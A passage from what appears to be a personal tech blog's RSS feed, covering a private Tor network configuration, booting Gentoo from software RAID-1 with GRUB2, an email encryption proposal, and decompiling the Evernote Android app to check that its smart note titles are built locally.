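# torrc sketch for one Directory Authority on a private tor network
Nickname        auth1
DataDirectory   /directory/tor-instance-1/var/lib/tor
SOCKSPort       0
ORPort          5001
DirPort         7001

AuthoritativeDirectory   1
V3AuthoritativeDirectory 1
V3AuthVotingInterval 5 minutes
V3AuthVoteDelay      30 seconds
V3AuthDistDelay      30 seconds
AuthDirMaxServersPerAddr 0   # 0 = unlimited relays per IP
AssumeReachable 1            # skip the 30 minute reachability wait

# One line per authority - identical in the configuration of every
# DirAuth, Node, and Client on this network
DirServer auth1 orport=5001 v3ident=&lt;V3IDENT1&gt; 10.0.0.1:7001 &lt;FINGERPRINT1&gt;
DirServer auth2 orport=5002 v3ident=&lt;V3IDENT2&gt; 10.0.0.2:7002 &lt;FINGERPRINT2&gt;
DirServer auth3 orport=5003 v3ident=&lt;V3IDENT3&gt; 10.0.0.3:7003 &lt;FINGERPRINT3&gt;
</pre></blockquote>

<p>A relay or client config drops the authority-specific options and keeps only the shared <tt>DirServer</tt> block (plus <tt>EnforceDistinctSubnets 0</tt> and <tt>AssumeReachable 1</tt> where noted above).</p>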
	
<p>At this point, you can add those <tt>DirServer</tt> lines to some clients and start sending traffic through your network.  The only hard thing left is soliciting hundreds to thousands of relay operators to see the value in splitting from the official network to join yours. =)</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-grub2_raid_boot.html</guid>
		<title>Booting from RAID using GRUB2</title>
		<pubDate>28 Sep 2014 22:51:23 EST</pubDate>
		<description><![CDATA[
<p>Many moons ago, before Grub2 came about, I looked into booting from a RAID partition.  It was possible, but quite difficult.  Today it's possible, but only slightly difficult.  I can't claim this blog post is 100% accurate, but these are my experiences, and if you got here via a search engine for a particular error, hopefully it will help guide you.</p>

<p>I started from a complete, working Gentoo installation on one hard drive comprised of the <a href="http://www.gentoo.org/doc/en/handbook/handbook-amd64.xml?part=1&chap=4">recommended 4 partitions</a> - call it hard drive <tt>sda</tt>.  I wanted to migrate this installation to a RAID-1 setup where there were two disks, four RAID partitions (md0, md1, md2, md3), in the same configuration.  And, of course, boot from this RAID configuration. The second hard drive, blank, is <tt>sdb</tt>.</p>

<p>There are several players in the boot process, and you're going to need to cater to every one of them:

<ul>
<li>The GRUB Core Image</li>
<li>The GRUB Configuration</li>
<li>The Kernel Autodetection</li>
<li>The Kernel Configuration</li>
</ul></p>


<h2>Converting The System to RAID-1</h2>

<p>You're going to need to do a lot of configuration, and then reboot, and hope it works. If it didn't work, you can safely back out of it, but reconfiguring will be a little tricky.</p>

<p>Follow this <a href="http://www.pinguin-systeme.net/faq/linux_installation_configuration/how-can-i-convert-my-running-system-to-a-raid-1-system">excellent tutorial</a>.  The gist of it is:</p>

<ul>
<li>Replicate the partition structure of sda on sdb</li>
<li>Make sure the partition types are <tt>0xFD</tt></li>
<li>Create RAID arrays on each partition, with a missing disk, using the old superblock format, e.g.: <tt>mdadm --create /dev/md4 --level=1 --metadata=0.90 --raid-disks=2 missing /dev/sdb4</tt></li>
<li>Create the correct filesystems (ext4 probably) on your /dev/md devices</li>
<li>Confirm /proc/mdstat, then mount all your RAID arrays in /mnt or somewhere</li>
<li>Copy your filesystems across using <tt>cp -axu / /mnt/md4</tt> or such</li>
<li>Update your /etc/fstab</li>
<li>Don't reboot!  You've got more work to do...</li>
</ul>
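
<p>In command form, the gist looks roughly like this - a sketch only, with example device names and mount points; double-check everything against your own layout before running anything destructive:</p>

<blockquote><pre>
sfdisk -d /dev/sda | sfdisk /dev/sdb    # replicate the partition table
fdisk /dev/sdb                          # set each partition's type to 0xFD

# Degraded RAID-1 array, old 0.90 superblock (repeat for each partition)
mdadm --create /dev/md4 --level=1 --metadata=0.90 --raid-disks=2 missing /dev/sdb4
mkfs.ext4 /dev/md4
cat /proc/mdstat                        # confirm the (degraded) arrays exist

mount /dev/md4 /mnt/md4
cp -axu / /mnt/md4                      # copy the root filesystem across
vi /mnt/md4/etc/fstab                   # point entries at the /dev/md devices
</pre></blockquote>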

<h2>Configuring your Kernel</h2>

<p>Make sure you've got the appropriate options enabled in your kernel.  To be honest, I'm not sure exactly what options you need, but it's a safe bet you're going to need the options for your filesystem of choice (ext4?), your hard drive, and RAID compiled in.  (That is, not a module.)</p>

<p>You will also need to cater to a couple of other whims of the kernel, which I mentioned above but did not explain.  In more detail:</p>

<ul>
<li>The kernel will attempt to auto-assemble RAID arrays when the partition type is <tt>0xFD</tt> (RAID Auto-Assemble).  If the partition type is not <tt>0xFD</tt> - you will have a bad time.</li>

<li>The kernel is only capable of assembling a RAID array if the superblock is type 0.9, also known as 'really really old' <small><a href="https://forums.gentoo.org/viewtopic-t-888624-start-0.html">ref</a></small>.  Apparently, letting the kernel auto-assemble your RAID is deprecated <small><a href="http://webcache.googleusercontent.com/search?q=cache:KAiGbjz_VTIJ:forums.gentoo.org/viewtopic-t-988334-start-0.html+&cd=1&hl=en&ct=clnk&gl=us">ref</a></small> - but I opted to let it do it anyway to avoid mucking with an initramfs.</li>
</ul>

<h2>GRUB</h2>

<p>This part is going to be tricky.  <a href="http://unix.stackexchange.com/questions/17481/grub2-raid-boot">This post, which is not a tutorial,</a> was the most helpful piece of information I found. Roughly speaking, what I did was:</p>

<p>Made sure (as much as I could be) that the grub core image had the modules I needed.  I believe this is handled by adding <tt>GRUB_PRELOAD_MODULES="lvm diskfilter mdraid1x"</tt> to the end of <tt>/etc/default/grub</tt>.  You should also make sure <tt>package.use</tt> contains <tt>sys-boot/grub:2         device-mapper mount sdl</tt>.</p>

<p>Ran (and read) <tt>grub2-mkconfig</tt> along with <tt>grub-probe-verbose</tt> and confirmed that it was detecting the current hard drive (sda) as the booting hard drive, when I wanted it to be the <tt>/dev/md</tt> devices.  I copied it to <tt>grub2-mkconfig-fiddle</tt> and edited the following variables to be constants rather than queries to grub-probe.</p>

<blockquote><pre>
GRUB_DEVICE="/dev/md4"      #root filesystem
GRUB_DEVICE_BOOT="/dev/md2" #boot partition
</pre></blockquote>

<p>Generated the config file, and confirmed all the UUIDs by looking at <tt>ls /dev/disk/by-uuid</tt> and <tt>lsblk -o "NAME,UUID"</tt>.  I kept these around in a text file as it's easy to get confused about what UUIDs go where.</p>

<p>Finally ran <tt>grub2-install /dev/sdb</tt>.  (I only ran this on sdb, see below for why).</p>

<p>An interesting item I found was that after you set up your RAID array, and it is by necessity degraded, you will get error messages <small><a href="http://serverfault.com/a/626835">ref</a></small>.  These error messages are the same ones you will get if your grub core image is missing the modules it needs: <tt>grub2-install: warning: Couldn't find physical volume `(null)'. Some modules may be missing from core image</tt>.  How can you tell if the error messages are because your core image is incorrect or the array is degraded?  Who knows.</p>

<p>Now at this point, I shut the PC down, and unplugged the SATA cable that went to sda.  You'll probably need to use <tt>smartctl -i</tt> to get the Serial Number of the drives so you know which is which.  I didn't have to, but my logic was - if I bork this so much, I'll just replug it in and be back at square one. This was actually quite helpful, as I was able to switch my system between a working and non-working state.  I also leaned heavily on a LiveCD while I worked through all the kinks.  (While this blog post was presented linearly, my process was anything but.)</p>


<h2>Cleanup</h2>

<p>After you're successfully booting into your RAID, you'll need to shut down, connect the second hard drive (sda), and boot. Cross your fingers your machine boots off sdb - if not, try changing the priority in BIOS.  Once you're booting into your RAID partitions, add the sda[1-4] partitions to the appropriate RAIDs, change the partition types on sda to <tt>0xFD</tt>, and remember to clean up the legacy grub installation on sda with <tt>grub2-install /dev/sda</tt>.</p>
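
<p>The cleanup amounts to something like the following - again a sketch, with example device and array names:</p>

<blockquote><pre>
fdisk /dev/sda                     # change the types of sda1-4 to 0xFD
mdadm --add /dev/md4 /dev/sda4     # repeat for each array/partition pair
cat /proc/mdstat                   # watch the resync until it completes
grub2-install /dev/sda             # replace the legacy grub install on sda
</pre></blockquote>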

<p>Finally - what's the point of RAID if it doesn't actually work when a hard drive dies?  Shut down your computer and unplug sdb.  Boot, and make sure it works.  Shut down, re-add sdb, make sure the RAID recovery is done, then repeat for sda.</p>

<h2>Other</h2>

<p>I ran into a couple of other problems.  I didn't set the superblock format correctly the first time.  I didn't look too hard, but I couldn't find a way to change the format in-place without wiping the array.  So I wiped it, and re-copied it - it didn't pose a big problem in my situation.</p>

<p>Another was that after I got into the kernel, it hung at the line "Switched to clocksource tsc".  This was, as far as I could tell, not related to the RAID stuff.  If you google this, you'll find a ton of people having this problem, including a lot on Ubuntu.  <a href="https://forums.gentoo.org/viewtopic-t-941322-start-0.html">This thread</a> solved the problem for me - I needed to enable <tt>CONFIG_DEVTMPFS_MOUNT</tt> in the kernel.</p>

<p>After I got it booted, something (probably my constant LiveCD-ing) had renamed my RAID arrays into md124, md125, md127, and md4.  This annoyed me.  I found <a href="http://www.jross.org/articles/tech-guides/rename-a-linux-md-device/">a promising article</a>, but alas it doesn't help when the superblock is 0.9 or when you need to rename the root filesystem that is mounted. The answer is actually <a href="http://superuser.com/a/346742">in this answer</a> under "Option #2" - you need to update the 'Preferred Minor' value.</p>
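
<p>For a 0.90 superblock, that rename boils down to reassembling the array with an updated 'Preferred Minor'.  Roughly (example devices; for the root filesystem you'd do this from a LiveCD, since a mounted array can't be stopped):</p>

<blockquote><pre>
mdadm --stop /dev/md127
mdadm --assemble /dev/md1 --update=super-minor /dev/sda1 /dev/sdb1
</pre></blockquote>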

<p>Finally, during my testing, I pulled the cable to sdb, and tried booting off just sda.  I got a kernel panic in <tt>native_smp_send_reschedule</tt> - it took me a bit to remember what caused this error, as I had definitely seen it before in my fiddling.  This is the error you may get if your partition types are not set to <tt>0xFD</tt>.  After I fixed that, I was able to pull either cable and still boot.</p>

<p>After all that, I was (finally) good to go.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-uee_email_encryption.html</guid>
		<title>Universal Email Encryption Specification</title>
		<pubDate>27 Nov 2013 12:00:23 EST</pubDate>
		<description><![CDATA[
<p>Last May, I was in Hong Kong for <a href="https://www.openitp.org/openitp/circumvention-tech-summit.html">OpenITP's Circumvention Tech Summit</a> - and I ended up taking an afternoon walk with none other than <a href="https://www.debian-administration.org/users/dkg">Daniel Kahn Gillmor</a>. Over a 7 hour and I-have-no-idea-how-many-kilometer walk, we talked about a ton of things, until I eventually asked him "Why don't you think we have email encryption?"</p>

<p>We talked about a lot of the hard problems of email encryption - problems that are difficult to solve while still being intuitive and easy for non-technical users, and not disrupting their preferred workflow. Things like Key Discovery and Key Authenticity, webmail, and moving keys between devices.</p>

<p>We were kind of beating around the bush, and finally I just said what we were both thinking: "Maybe providers should manage keys for most people."  He agreed that this seemed like the best way to get wide adoption.  (Remember, this was all pre-Snowden.)</p>

<p>We chatted some more, about key discovery in DNS (which would later be amended to HTTP), about encouraging email providers to do encryption on behalf of users, and more importantly (to us, as well as you I'm sure) - allowing users to manage their own keys and upload the public component.</p>

<p>What we saw was ubiquitous email encryption, where every email sent between major participating providers is encrypted. And in a large percentage of cases, it's encrypted provider-to-provider. But in a small percentage of cases - it's encrypted provider-to-end or end-to-end. We feel that if email encryption really was ubiquitous, the clients we have now (Enigmail, S/MIME in Outlook and so on) would be developed and promoted to first class citizens, and things like browser extension-based email encryption would be fleshed out considerably. So while the early adopters (the people who use email encryption today) would use the painful tools we have now - there'd be a huge investment in tool development, and .01% of users would grow to .1%, and then 1%, and maybe to 10%.</p>

<p>We laid out as many pieces as we could, specifying a key discovery mechanism that doesn't leak metadata, signaling information to learn if a provider (and user) has opted in to email encryption while blocking downgrade attacks, a report-only mode to prevent a flag day, a minimal level of key authenticity that can optionally be increased on a provider basis, failure reporting, enrollment steps for the many different ways email accounts are created on the web, and some suggestions for encrypted message format. </p>

<p>And then a few months later, a man named Edward Snowden came into our lives.</p>

<p>The PRISM revelations show widespread complicity on the part of centralized email providers, but more importantly they reveal a broad overreach of the government, and a disturbing trend towards rule by secret law.</p>

<p>We still like this protocol, even post-Snowden. An encrypted email solution that requires end-to-end encryption, with no provision for an email provider to read the mail, is unlikely to be deployed by large corporations that have regulatory monitoring and reporting requirements - industries like large Law Firms, Financials, and Healthcare - plus all business that have to support <a href="https://en.wikipedia.org/wiki/Electronic_discovery">E-Discovery</a> and <a href="https://en.wikipedia.org/wiki/Data_loss_prevention_software">Data Loss Prevention</a>. You may not like those things (and you may be morally opposed to them), but they are what companies require or have to live with. Those organizations could try to meet some of these requirements under an end-to-end encrypted e-mail scheme (for example, by operating key escrow services), but having direct cleartext access to their users' mail is technically much simpler.   By making these use cases a standard, and making the feature as visible to mail users as https is to people who browse the web, we hoped to get large companies on board and have them share the initial development and deployment cost.  We aimed for <strong>ubiquitous</strong> email encryption - business-to-business, between work email accounts and personal accounts. Yet another fragmented internet, where only a few of our contacts supported encryption, was no more interesting than the status quo.</p>

<p>But although we like it, the current situation in the US and the requirements placed upon (and cooperation of) large companies like Google and Verizon means that granting the provider a centralized place of trust in email encryption is a non-starter. And as a complicating factor, the thing the government has been most interested in has been metadata - the very thing that is afforded the least protection under the law and simultaneously the most difficult to protect in a point-to-point protocol. There are efforts to fight this technically (like Tor), but we feel the legal atmosphere must change as well as the technical infrastructure.</p>

<p>We're posting our specification and supporting documents online for people to refer to, in the public domain. It's <a href="https://github.com/tomrittervg/uee" class="themainlink">over on github</a>. Email encryption is hard, and when you start thinking about all the corner cases (like automatically putting mailing list footers into a signed message) - it gets harder. We're hedging our bets. We hope that the legal atmosphere changes. Barring that, we hope this document and its appendixes help other people look at the problem and make progress where we got stalled.</p>

<p>Oh yea - what's it called? Well, when we walked around in Hong Kong, we were calling it "STEED-Like", after <a href="http://g10code.com/steed.html">Werner Koch's STEED Proposal</a>, which we drew inspiration from. When we realized how much we deviated from it, we dubbed it UEE for Universal Email Encryption - with the intention of finding a better name when we released it. But that day never came. So until we have a legal environment where this might make sense... pronounce it like wheeeeeeeee, but with a you in the front.  <strong>YOU-EEEEEEEEEEEEEEEEEEEEEEEE</strong>!</p>

<p><small>The biggest argument we've seen against this proposal is that StartTLS (TLS-encrypted SMTP links between providers) gets you almost the same thing, for most users, with way less work. We love StartTLS and want to see it working <a href="/blog-no_email_security.html">way better than it does now</a>. But we think that just getting to widespread email encryption (even if some or even most keys are provider-managed) would spur the development and smoothing out of client-based encryption, which would in turn let more people opt in to managing their own keys, getting true end-to-end security not possible with StartTLS.</small></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-evernote_privacy.html</guid>
		<title>Evernote, and Privacy Preserving Applications</title>
		<pubDate>14 Nov 2013 23:09:23 EST</pubDate>
		<description><![CDATA[
<p>I'd like to take a moment to talk about privacy preserving by default. </p> 

<p>I don't intend for this to be a rant about current commercial decisions - instead I'd like it to be praise of what I think (and hope) is great design, and use it to try and set an example that other people can follow.  I was talking with a friend recently, and he talked about how, ultimately, most people want personalization, they want ease of use, they want features from services, and they're willing to give up their privacy in order to get those features. I don't disagree with either of his points - I agree with them entirely.  But I challenge the assumption that getting those features, getting that ease of use, <em>requires</em> giving up their data to a third party.  And I instead pose the question: "If you can get the <em>exact same</em> feature, provided in a privacy preserving way - say, computed locally on your phone, as opposed to bulk-shipping your data out to a third party and having them analyze it on their servers - I think everyone would prefer to get it the privacy preserving way. So why not do that?"</p>

<p>Let's talk about a heart attack I had recently.</p>

<p>I use Evernote. Flame me, whatever, I'm not using it for work or for sensitive things, I'm using it for gift ideas I see in stores and simple things.  If there was something I could run myself that had a shiny mobile app and a web UI, I'd use that, but there isn't, so let's move on.  I took a photo while I was at <a href="https://csaw.isis.poly.edu/threads/">THREADS</a> today, and when I went to add it in Evernote I got this screen:</p>

<center><p><img src="/resources/evernote-title.png" /><br />
<em>Note, I recreated this with a quick shot of my laptop</em></p></center>

<p>How, in the hell, did it know I was at THREADS.</p>

<p>Was it doing some sort of geolocation combined with local events? I was so disturbed by this I searched for it: <a href="https://encrypted.google.com/search?hl=en&q=evernote%20smart%20title">evernote smart title</a><sup>1</sup>.  This led me to a <a href="http://blog.evernote.com/blog/2012/02/07/evernote-for-ios-update-smart-titles-better-editing-easier-sharing-and-more/">blog post announcing the feature</a>.</p>

<blockquote> Now, when you create a new note and save it without giving the note a title, the app will assign a contextual title using calendar events, your location, note contents, and other information.</blockquote>

<p>This is a great example of a totally legitimate, useful feature that most people (including myself) would like.  Without it, I'm going to have to type what is likely to be a redundant title (as I'm only putting a few words to remind myself what I took a photo of), or have the title remain 'Untitled'.  But as someone somewhat concerned about my privacy, it also filled me with dread.  I knew there were two ways this was likely to be implemented.  One would be to read my location and calendar locally, and generate a title.  The other would be to bulk-ship my data up to their servers, analyze, and send back a pregenerated title.  Let's see which they do.</p>

<p>I don't really intend for this to be an Android App Reversing Walkthrough, but I do want to cover what I had to go through to figure this out, because it's really not that hard and I think the community should be doing more of this to answer questions like "Hey, how the heck does [Flavor of the Week 'Secure' Message App Work]?"  So I'm going to skip the 'easy' parts, and dig into the more difficult reversing.  I'll point to <a href="https://intrepidusgroup.com/insight/2013/02/armor-for-your-android-apps-shmoocon-follow-up/">Intrepidus Group</a> and your search engine for getting you past the part where you pull the APK off the device, and run it through dex2jar.  At this point, we've got a pile of decompiled java files.  Let's dig in. </p>
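
<p>For reference, the part I'm skipping is roughly this - a sketch, since the exact package path and tool names depend on your device and your dex2jar version:</p>

<pre>
$ adb shell pm path com.evernote          # locate the APK on the device
$ adb pull /data/app/com.evernote-1.apk
$ unzip com.evernote-1.apk -d unzipped    # classes.dex, resources.arsc, etc.
$ d2j-dex2jar com.evernote-1.apk          # convert the dex to a jar
# then decompile the jar (e.g. with jad) into a directory like jad-ed/
</pre>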

<br /><br />
<hr style="width:50%">
<br /><br />

<pre>$ grep -R title *</pre>

<p>This yields 810 results.  Way too broad, let's try another tactic.</p>

<pre>$ grep -R "Picture from" *</pre>

<p>This yields no results.  This made me a little nervous, because if the title was generated locally, I'd expect that string fragment to be found somewhere.  New tactic.  This data came from my calendar, so let's look at calendar API calls.  Searching for a few API calls, I found a folder called 'smart/noteworthy'.  The feature is called 'smart titles' so this may be it.  But before I spend a ton of time reading the code, I can do more 'quick, dirty, and coarse' approaches that may get me nothing, or may get me a jackpot.</p>

<p>In fact, I realized I was omitting a key debugging tool: running the application while tailing logs with <u>adb logcat</u>.</p>

<pre>
I/EN      (26873): [NewNoteFragment] - canAttachFile()::mimeType=image/*
I/EN      (26873): [NewNoteFragment] - canAttachFile()result=true
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::7
D/EN      (26873): [a] - <span style="color:red">generateAutoTitle()::title=null</span>
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::5
D/EN      (26873): [a] - starting events query+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I/EN      (26873): [a] - Attachment()::uri=content://media/external/images/media/1764 mMimeType=image/jpeg type=0::mTitle=null
I/EN      (26873): [a] - findType()::type=4 mimeType=image/jpeg
I/EN      (26873): [a] - isSupportedUri()true
I/EN      (26873): [a] - Attachment()::mType=4mTitle=IMG_20131114_184957 mMetainfo=1 Mb mMimeType=image/jpeg
I/EN      (26873): [a] - Attachment()::mTitle=IMG_20131114_184957 mMetainfo=1 Mb
D/EN      (26873): [a] - events=1
D/EN      (26873): [ab] - isMultishotCameraAvailable: platform support = true Native library support = true
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::7
D/EN      (26873): [a] - <span style="color:red">generateAutoTitle()::title=null</span>
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::6
D/EN      (26873): [NewNoteFragment] - getAddress-running
I/ActivityManager( 1681): Displayed com.evernote/.note.composer.NewNoteAloneActivity: +373ms
D/EN      (26873): [ab] - isMultishotCameraAvailable: platform support = true Native library support = true
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::7
D/EN      (26873): [a] - <span style="color:red">generateAutoTitle()::title=Picture from THREADS</span>
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::7
D/EN      (26873): [a] - <span style="color:red">generateAutoTitle()::title=Picture from THREADS</span>
I/EN      (26873): [NewNoteFragment] - mHandler()::handleMessage()::7
D/EN      (26873): [a] - <span style="color:red">generateAutoTitle()::title=Picture from THREADS @ Town, State</span>
D/EN      (26873): [NewNoteFragment] - showHelpDialog()
</pre>

<p>Now that is what I'm looking for.  I locate that method, and it has code fragments like:</p>

<pre>
localObject2 = paramContext.getString(2131165339);
...
paramContext.getString(2131165687);
</pre>

<p>If you're a little familiar with Android, you probably realize this is something like <u>context.getString(R.string.YOUR_STRING);</u> but now it's been turned into a constant.  Let's trace it down.</p>

<pre>
$ grep -R 2131165339 *
jad-ed/com/evernote/android/multishotcamera/R$string.java:  public static int <span style="color:red">untitled_note = 2131165339</span>;
jad-ed/com/evernote/note/composer/a.java:              localObject2 = paramContext.getString(2131165339);
jad-ed/com/evernote/note/composer/p.java:      paramString = paramContext.getString(2131165339);
jad-ed/com/evernote/provider/a.java:            str2 = this.b.getString(2131165339);
jad-ed/com/evernote/ui/NewNoteFragment.java:        str1 = this.bl.getString(2131165339);
jad-ed/com/evernote/ui/NewNoteFragment.java:      str = b(2131165339);
jad-ed/com/evernote/ui/QuickSaveFragment.java:        this.bm = b(2131165339);

$ grep -R untitled_note *
Binary file com.evernote-1.apk matches
jad-ed/com/evernote/android/multishotcamera/R$string.java:  public static int <span style="color:red">untitled_note = 2131165339</span>;
Binary file unzipped/classes.dex matches
Binary file unzipped/resources.arsc matches
</pre>

<p>Frankly, I'm still not sure why this was tracked down to the exact human-readable resource string - but generally speaking, our goal in Reverse Engineering is to stay as broad as we can until we have to go deep.  I traced down more of these constants, inlined them, and followed the trail.</p>

<pre>
//These statements were not in this order, just placing them together for brevity
localObject2 = paramContext.getString("auto_title_from_meeting_at_location", new Object[] { localObject2, str1, str2 });
localObject2 = paramContext.getString("untitled_note");
localObject2 = paramContext.getString("auto_title_from_meeting", new Object[] { localObject2, str1 });
localObject2 = paramContext.getString("auto_title_at_location", new Object[] { localObject2, str2 });

//Clearly str1 refers to the meeting name, and str2 the location
//Where do they come from?

str1 = b();
str2 = c();

private String b() //get meeting
{
    if ((this.m != null) && (this.m.length > 0))
        return this.m[0];
    return null;
}
private String c() //get location
{
    StringBuilder localStringBuilder = new StringBuilder("");
    if (this.a != null) //this.a is "public Address a;"
    {
        String str1 = this.a.getLocality();
        boolean bool = TextUtils.isEmpty(str1);
        int i1 = 0;
        if (!bool)
        {
            localStringBuilder.append(str1);
            i1 = 1;
        }
        String str2 = this.a.getAdminArea();
        if ((!TextUtils.isEmpty(str2)) && (!str2.equalsIgnoreCase(str1)))
        {
            if (i1 != 0)
                localStringBuilder.append(", ");
            localStringBuilder.append(str2);
        }
    }
    return localStringBuilder.toString().trim();
}

//Let's trace down this.m
public final void b(Bundle paramBundle)
{
    this.a = ((Address)paramBundle.getParcelable(q));
    this.m = paramBundle.getStringArray(p);
}
</pre>

<p>So we've figured out where the location-based part comes from.  It's using a <a href="https://developer.android.com/reference/android/location/Address.html">Geolocation API</a> to grab that.  Hunting down where the Meeting name came from is going to be much more difficult.</p>

<p>In fact, this is where I spent the bulk of my time.  I did greps like <u>grep -R ".b(" ../../</u>, and when that was too coarse, <u>grep -R "b(" ../../../../ | grep ";" | grep -v ","</u> - but I wasn't finding much.  I decided to import it into Eclipse.  Now clearly, Eclipse wasn't going to be able to build it.</p>

<center><p><img src="/resources/evernote-build-errors.png" /></p></center>

<p>But I was hoping Eclipse would be able to build enough of it, and provide enough code navigation features, to get a couple of hints out of it.  And indeed, when I referenced all public callers of "b(Bundle paramBundle)", I did wind up with one:</p>

<center><p><img src="/resources/evernote-call-hier.png" /></p></center>

<p>Now at this point, I wasn't really getting much out of it.  I read a lot of this code, and tried to figure out where things were going.  I deciphered a lot more of the surrounding code, running down getString() calls and such.  Like I said before - we stay broad until we have to go deep.  I alternated between going deep, trying to outline what individual functions did while periodically stepping back and skimming the 2-3 surrounding classes.</p>

<p>Eventually, I was confused enough to take a step back.  You see, I'm working with decompiled Java code - this is <em>not</em> what the original developers wrote.  It's what a tool has translated from bytecode back into Java.  It's a bit spaghetti-like, it's a bit wrong.  In fact, one function was actually marked as undecompilable:</p>

<pre>
// ERROR //
  private static String[] b(Context paramContext, String paramString)
  {
    // Byte code:
    //   0: aconst_null
    //   1: astore_2
    //   2: aload_0
</pre>

<p>So with the experience that only comes from having done this before and understanding the limitations of one's tools, I stepped back even further. I needed to redo this decompilation.  Fortunately, there are other Java decompilers out there.  And using a second one, I was able to get a successful decompilation of this previously-undecompilable b() function.</p>

<pre>
    private static String[] b(Context context, String s1)
    {
        Cursor cursor;
        ContentResolver contentresolver;
        cursor = null;
        contentresolver = context.getContentResolver();
        Cursor cursor2 = contentresolver.query(Uri.parse("content://com.android.calendar/calendars"), new String[] {
            "_id"
        }, s1, null, null);
        Cursor cursor1 = cursor2;
        if(cursor1 == null) goto _L2; else goto _L1
_L1:
        String as[] = new String[cursor1.getCount()];
        int i1 = 0;
_L5:
        if(!cursor1.moveToNext()) goto _L4; else goto _L3
_L3:
        as[i1] = cursor1.getString(0);
        i1++;
          goto _L5
_L2:
        if(cursor1 != null)
            cursor1.close();
        as = null;
_L7:
        return as;
</pre>

<p>This seems obvious in retrospect, but it's only by comparing the decompilations in detail that I saw just how wrong the first one was. Seemingly useless and unreachable code suddenly transformed into meaningful control flow statements. (Protip: compilers almost never emit unreachable code.)  The calendar event clearly comes from the calendar, locally, on note creation.</p>

<br /><br />
<hr style="width:50%">
<br /><br />

<p>Okay, let's step back again.  I suspected Evernote might be doing something really cruddy like sending all my calendar events to their server so they can serve these note titles.  I'm fairly certain that is not the case.  <strong>I have not reversed Evernote in its entirety and I am not saying they are not doing something very shady. They may well be. But for this single feature I looked at, I don't think they are.</strong><sup>2</sup></p>

<p>But ultimately, I come back to the question I posed in the beginning: "If you can provide an awesome feature, and do it in a privacy preserving way, as opposed to a 'do the computation on our servers' approach, why not do that?" - and I'll add: why not <strong>advertise</strong> that?  In the age of <a href="http://thehill.com/blogs/hillicon-valley/technology/280587-path-mobile-app-agrees-to-ftc-settlement-over-privacy-violations">legal liability</a> for <a href="http://www.huffingtonpost.com/2012/02/17/mobile-apps-privacy-federal-trade-commission_n_1284518.html">privacy violations</a> and <a href="http://blogs.wsj.com/wtk-mobile/">consumer interest in privacy</a> - compounded even further post-Snowden - why <em>not</em> differentiate and advertise on <em>technical constraints</em> for privacy, in addition to making a sleek and awesome app and service? Tell people "Hey, we don't just take your privacy 'seriously' like everyone else, we provide our features <em>on your phone</em> so we <em>never see the data</em>."</p>

<p>Another great example of a complete start-up idea: geolocation-based notes. I would love, and pay for, an app that let me put down groceries on a shopping list and reminded me when I walk into the grocery store.  Let me put down a marker: "When I drive by this point in the road, at this time of day, remind me to pull over and put the clothes I've been trying to donate for a month in the donation bin."<sup>3</sup> But all the apps I'm aware of that do this either don't work well, or send all your data (including location) to the server.  This could run on the phone - there's no reason why it couldn't.  I'll do your monetization strategy one better - sell me little bluetooth or NFC thingies I put at my front door, car, wallet, whatever.  Let me make a note like "If I leave the house, remind me to grab the bills I need to mail" or "If I get in the car, and I don't have my wallet, freak out."  Or go turn <a href="https://nohats.ca/wordpress/blog/2012/04/06/geome-a-small-utility-to-get-your-geo-location-to-be-used-by-otr/">Paul Wouters's privacy preserving Google Latitude-like location-sharing</a> into an app. There's a lot of ideas here.</p>

<p>I'll talk about one more example.  <a href="https://play.google.com/store/apps/details?id=org.thoughtcrime.redphone">RedPhone</a> is an app that lets you make encrypted phone calls to people who also have RedPhone. But because it's annoying to have to manually choose to use RedPhone - plus the problem of knowing which of your contacts have RedPhone to begin with - RedPhone will prompt you to upgrade your call to an encrypted call if the person you're calling also uses RedPhone. How does it know the other person uses RedPhone? Well, it could A) send all your contacts to the server and have it tell you which people have RedPhone<sup>4</sup>, B) send the list of everyone who has RedPhone to you, or C) do something way sexier.  What it does is send down a <a href="https://en.wikipedia.org/wiki/Bloom_filter">bloom filter</a> that allows you to <a href="https://github.com/WhisperSystems/RedPhone/blob/master/src/org/thoughtcrime/redphone/directory/NumberFilter.java#L63">ask</a> if any individual number has RedPhone, but doesn't give you the entire list of RedPhone users, nor send your contacts to the server.<sup>5</sup></p>
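<p>To make the bloom filter idea concrete, here's a toy sketch - my own <u>ToyNumberFilter</u>, not RedPhone's actual implementation or wire format (RedPhone derives its bit indices from proper cryptographic hashes, not String.hashCode):</p>

```java
import java.util.BitSet;

// A toy Bloom-filter directory in the spirit of RedPhone's NumberFilter.
// The server ships the bit array down to the client; the client can then
// ask "might this number be registered?" locally, without ever uploading
// its contacts. My own sketch, not RedPhone's wire format.
class ToyNumberFilter {
    private final BitSet bits;
    private final int size;
    private final int hashCount;

    ToyNumberFilter(int size, int hashCount) {
        this.bits = new BitSet(size);
        this.size = size;
        this.hashCount = hashCount;
    }

    // Derive the i-th bit index for a number. A real implementation
    // would use a cryptographic hash here.
    private int index(String number, int i) {
        int h = (number + ":" + i).hashCode();
        return (h & 0x7fffffff) % size;
    }

    void add(String number) {               // server side: register a user
        for (int i = 0; i < hashCount; i++)
            bits.set(index(number, i));
    }

    boolean mightContain(String number) {   // client side: local lookup
        for (int i = 0; i < hashCount; i++)
            if (!bits.get(index(number, i)))
                return false;  // definitely not registered
        return true;           // probably registered (false positives possible)
    }

    public static void main(String[] args) {
        ToyNumberFilter directory = new ToyNumberFilter(1024, 3);
        directory.add("+14155551234");
        System.out.println(directory.mightContain("+14155551234")); // true
    }
}
```

<p>The tradeoff is false positives: the filter will occasionally say "probably registered" for a number that isn't, but it will never miss one that is - and the server never learns who you asked about.</p>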

<p>That's what I'd like to see more of.  I'd like to see <strong class="themainlink">novel apps selling an innovative product that people want, not necessarily selling privacy - but still developed in a privacy-preserving way.</strong> Call me naive, but I believe you can build an awesome, innovative app that fills a niche <em>and</em> is privacy preserving - not privacy preserving as its selling point with half-baked features added elsewhere<sup>6</sup>.</p>

